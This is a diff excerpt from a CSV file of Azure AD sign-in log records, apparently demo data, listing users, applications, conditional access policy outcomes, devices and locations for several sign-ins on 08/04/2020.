Online,24b904d7-063a-4f4c-9637-40c772e51500,SigninLogs,Sucess,41.90428925,-85.99833679
+1260,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:20.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,939025e3-eeea-4115-9649-a12a099d52b9,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c6df9c5c-6712-4175-a3db-58ce916f1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,c6df9c5c-6712-4175-a3db-58ce916f1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1261,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:43.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,22ce469f-7036-0000-5d24-97ceae886fed,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e9cfabe1-d666-446f-aeb7-5817e00e1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cfabe1-d666-446f-aeb7-5817e00e1600,SigninLogs,Sucess,33.7984581,-84.38828278
+1262,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cecd469f-10e5-0000-4780-a9a261c3bfe8,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cd98cc-4177-459a-870c-d2e4b5051400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cd98cc-4177-459a-870c-d2e4b5051400,SigninLogs,Sucess,41.90428925,-85.99833679
+1263,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:13.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0c14a9eb-aa82-4986-97ba-09a7315c061a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cd98cc-4177-459a-870c-d2e4e0061400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cd98cc-4177-459a-870c-d2e4e0061400,SigninLogs,Sucess,41.90428925,-85.99833679
+1264,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:03.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,03ac6de1-4fc0-4f0d-846e-255e1e574945,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c95450b3-582d-4306-9dd2-9bdaaac21500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c95450b3-582d-4306-9dd2-9bdaaac21500,SigninLogs,Sucess,36.6404686,-78.26995087
+1265,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:14.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,16cc012e-731f-490e-8819-bb820c9e7ff7,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",9303d935-cf24-489a-bd00-a11cc6501500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,9303d935-cf24-489a-bd00-a11cc6501500,SigninLogs,Sucess,41.90428925,-85.99833679
+1266,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:20.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,939025e3-eeea-4115-9649-a12a099d52b9,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c6df9c5c-6712-4175-a3db-58ce916f1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,c6df9c5c-6712-4175-a3db-58ce916f1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1267,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,07ce469f-d0de-0000-54b3-321fea1aecb8,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f6bd881600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d09c2317-414d-4072-ab4f-d2f6bd881600,SigninLogs,Sucess,41.90428925,-85.99833679
